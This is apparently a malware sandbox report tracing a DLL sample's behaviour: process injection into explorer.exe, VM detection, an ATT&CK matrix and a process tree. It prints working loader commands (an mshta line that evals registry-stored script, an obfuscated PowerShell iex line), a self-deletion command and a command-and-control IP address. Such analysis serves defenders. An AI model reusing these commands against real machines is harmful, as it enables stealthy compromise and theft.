                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE6DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,3_2_04DE6DB6
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7080
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{5840C7B2-D747-4A43-210C-FB1EE5005F32}
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{08B24B58-C72D-7A90-91BC-EB4E55B04F62}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: HxEWwh74qT.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.390436792.0000000000480000.00000002.00000001.01000000.00000003.sdmp, HxEWwh74qT.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DEB2FF push esi; retf 3_2_04DEB301
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE820B push ecx; ret 3_2_04DE821B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE7E20 push ecx; ret 3_2_04DE7E29
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC008253C8 push FFFFFFD3h; iretd 20_2_000002DC008253CA
                      Source: HxEWwh74qT.dllStatic PE information: real checksum: 0x872fe521 should be: 0xa724b
                      Source: pkbugtxo.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x97df
                      Source: lboh4mlq.dll.27.drStatic PE information: real checksum: 0x0 should be: 0x10db8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6148 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6900 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4995
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2575
Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: explorer.exe, 00000021.00000000.575738488.0000000006389000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000000.524566576.0000000004150000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i&
Source: RuntimeBroker.exe, 00000029.00000000.593267648.00000188B362A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}6bf
Source: explorer.exe, 00000021.00000000.534612496.0000000007D2A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000021.00000000.534245853.0000000007C08000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00Iy
Source: explorer.exe, 00000021.00000000.534463390.0000000007CC2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000v
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\System32\loaddll32.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 146.70.35.138 80
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF6B9F112E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 42C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FF8DBEB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 910000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 430000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 7FF8DBEB1580
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\explorer.exe base: 2650000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1FAB525000
Source: C:\Windows\System32\control.exe | Memory protected: C:\Windows\explorer.exe base: 7FF8DBEB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FF8DBEB1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\explorer.exe base: 2650000 protect: page execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3808 base: 42C000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3808 base: 7FF8DBEB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3808 base: 910000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3808 base: 7FF8DBEB1580 value: 40
Source: C:\Windows\System32\control.exe | Memory written: PID: 3808 base: 430000 value: 00
Source: C:\Windows\System32\control.exe | Memory written: PID: 3808 base: 7FF8DBEB1580 value: EB
Source: C:\Windows\System32\control.exe | Memory written: PID: 3808 base: 2650000 value: 80
Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 6020
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3808
Source: C:\Windows\System32\control.exe | Thread register set: target process: 3808
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: DBEB1580
Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: DBEB1580
Source: C:\Windows\explorer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: DBEB1580
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Lpje='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Lpje).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.572023621.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.562172820.0000000000D00000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program ManagerG
Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.527408975.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.580135595.0000000005920000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.572023621.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.562172820.0000000000D00000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000021.00000000.523000096.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.572023621.0000000000D00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.562172820.0000000000D00000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000021.00000000.522462073.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.571046642.0000000000628000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.525990787.0000000000628000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ProgmanPV*
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DE12D3 cpuid 3_2_04DE12D3
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DE5410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_04DE5410
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DE515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_04DE515F
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DE12D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_04DE12D3

Stealing of Sensitive Information

Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE

Remote Access Functionality

Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
Source: Yara match | File source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation (1) | Path Interception | Process Injection (812) | Obfuscated Files or Information (1) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (11) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (1)
Default Accounts | Native API (2) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | File Deletion (1) | LSASS Memory | Account Discovery (1) | Remote Desktop Protocol | Email Collection (1) | Exfiltration Over Bluetooth | Encrypted Channel (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Command and Scripting Interpreter (1) | Logon Script (Windows) | Logon Script (Windows) | Masquerading (1) | Security Account Manager | File and Directory Discovery (1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion (31) | NTDS | System Information Discovery (25) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (11) | SIM Card Swap | Carrier Billing Fraud | 
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection (812) | LSA Secrets | Query Registry (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | 
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Rundll32 (1) | Cached Domain Credentials | Security Software Discovery (11) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features | 
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Virtualization/Sandbox Evasion (31) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact | 
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Process Discovery (3) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue | 
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Application Window Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction | 
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery (1) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact |  | 
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery
                      Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
Behavior Graph (ID 613862, sample HxEWwh74qT, start date 22/04/2022, architecture WINDOWS, score 100)

Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures.

Process tree (node numbers are the graph's own; "injected" marks a process that received code rather than being started; the counters after a process name are the graph's created-registry-value / created-file counters):

[2] start
  [9] loaddll32.exe (counter: 1)
    [13] cmd.exe (counter: 1)
      [25] rundll32.exe (counters: 1, 6)
          network: 146.70.35.138:80 from local port 49775, TENET-1ZA, United Kingdom
          signatures: System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
        [38] control.exe
            signatures: Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures
    [15] WerFault.exe (counters: 3, 9)
        network: 192.168.2.1 (unknown)
    [18] WerFault.exe (counters: 2, 9)
    [20] WerFault.exe (counters: 3, 9)
  [11] mshta.exe (counter: 19)
    [22] powershell.exe (counter: 33)
        signatures: Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures
      [29] explorer.exe (injected)
          signatures: Changes memory attributes in foreign processes to executable or writable; Self deletion via cmd delete; Disables SPDY (HTTP compression, likely to perform web injects); Creates a thread in another existing process (thread injection)
        [41] cmd.exe
            signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
          [51] conhost.exe
          [53] PING.EXE
        [43] RuntimeBroker.exe (injected)
        [45] cmd.exe
      [31] csc.exe (counter: 3)
          dropped: C:\Users\user\AppData\Local\...\pkbugtxo.dll (PE32)
        [47] cvtres.exe (counter: 1)
      [34] csc.exe
          dropped: C:\Users\user\AppData\Local\...\lboh4mlq.dll (PE32)
        [49] cvtres.exe
      [36] conhost.exe

Two independent chains are visible: the submitted DLL run through loaddll32.exe/rundll32.exe (which beacons to 146.70.35.138 and hops into control.exe), and an mshta.exe stage whose PowerShell compiles two helper DLLs with csc.exe and injects into explorer.exe, which in turn spawns the ping-then-delete cmd.exe used for self-deletion.
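The process chain above is the part of this report that carries over directly into detection engineering. The following is an added example, not code from the Joe Sandbox report or from the sample: it replays the tree as Sysmon-style process-creation events and evaluates detection logic for the behaviours the report flags (mshta spawning a shell, PowerShell compiling C# through csc.exe, rundll32 called by ordinal, control.exe spawned by rundll32, ping used as a sleep before del). Only the parent/child pairs and the pkbugtxo.dll name come from the graph; the PIDs, image paths and command-line text are constructed assumptions, and the rule names are the editor's, not Sigma rule titles.

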